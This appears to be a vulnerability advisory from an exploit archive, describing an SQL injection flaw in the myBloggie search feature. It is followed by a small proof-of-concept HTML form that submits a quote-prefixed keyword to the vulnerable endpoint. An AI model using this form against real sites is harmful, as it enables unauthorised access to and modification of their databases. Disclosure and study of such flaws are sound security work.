14 lines
No EOL
719 B
HTML
Executable file
14 lines
No EOL
719 B
HTML
Executable file
source: http://www.securityfocus.com/bid/15017/info
|
|
|
|
myBloggie is prone to an SQL injection vulnerability. This is due to a lack of sanitization of user-supplied input before passing it on to SQL queries.
|
|
|
|
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
|
|
|
|
<HTML><BODY>
|
|
<form
|
|
action="http://www.example.com/myBloggie/index.php?mode=search"
|
|
method="post" name="search" onsubmit="return
|
|
checkForm(this)"><center><input type="text"
|
|
name="keyword" size="12" value="'SQLInjection"> <input
|
|
type="submit" value="Inject this"></center></form>
|
|
</BODY></HTML> |